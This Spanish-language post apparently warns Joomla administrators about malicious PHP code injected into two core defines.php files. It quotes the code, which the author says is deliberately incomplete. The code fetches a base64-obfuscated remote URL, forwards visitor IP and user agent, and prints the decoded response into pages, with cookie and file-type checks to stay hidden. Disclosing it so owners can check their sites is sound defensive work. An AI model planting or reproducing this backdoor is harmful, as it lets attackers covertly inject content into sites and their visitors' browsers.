Se ha encontrado un código malicioso, se suele instalar en dos ficheros del núcleo de Joomla, estos:

– includes/defines.php
– administrador/includes/defines.php

es este, no se detecta desde el front, revisad que no os esté afectando: (faltan partes vitales para que no se haga mal uso del código malicioso)

//istart

function request_url_data($url) {
    $site_url = (preg_match('/^https?:\/\//i', $_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : 'http://' . $_SERVER['$
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            'X-Forwarded-For: ' . $_SERVER["REMOTE_ADDR"],
            'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"],
            'Referer: ' . $site_url,
        ));
        $response = trim(curl_exec($ch));
    } elseif (function_exists('fsockopen')) {
        $m = parse_url($url);
        if ($fp = fsockopen($m['host'], 80, $errno, $errstr, 6)) {
		 fwrite($fp, 'GET http://' . $m['host'] . $m["path"] . '?' . $m['query'] . ' HTTP/1.0' . "\r\n" .
                'Host: ' . $m['host'] . "\r\n" .
                'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"] . "\r\n" .
                'X-Forwarded-For: ' . @$_SERVER["REMOTE_ADDR"] . "\r\n" .
                    'Referer: ' . $site_url . "\r\n" .
                    'Connection: Close' . "\r\n\r\n");
            $response = '';
            while (!feof($fp)) {
                $response .= fgets($fp, 1024);
            }
            list($headers, $response) = explode("\r\n\r\n", $response);
            fclose($fp);
        }
    } else {
        $response = 'curl_init and fsockopen disabled';
    }
    return $response;
}

error_reporting(0);

$_passssword = "181211550dd5asdfasdfad0e7501";

if (!empty($_GET['check']) AND $_GET['check'] == $_passssword) {
    echo('');
}
unset($_passssword);

$bad_url = false;
foreach (array('/\.css$/', '/\.swf$/',, '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$$
    if (preg_match($regex, $_SERVER['REQUEST_URI'])) {
        $bad_url = true;
        break;
    }
}

$cookie_name = '_PHP_SESSION_PHP';
if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr$
    $url = base64_decode("aHR0cDoaSDFvL25pa2FyYWd1sC5jb20vYmxvZy8/YmY0eiZ1dG1fc291cfmNlPTkxODYwwOjIwNjAwNjozNDM=");
    $code = request_url_data($urlh);
	
	//    if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
    if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
        $echo_done = true;
        print $decoded;
    }
}//iend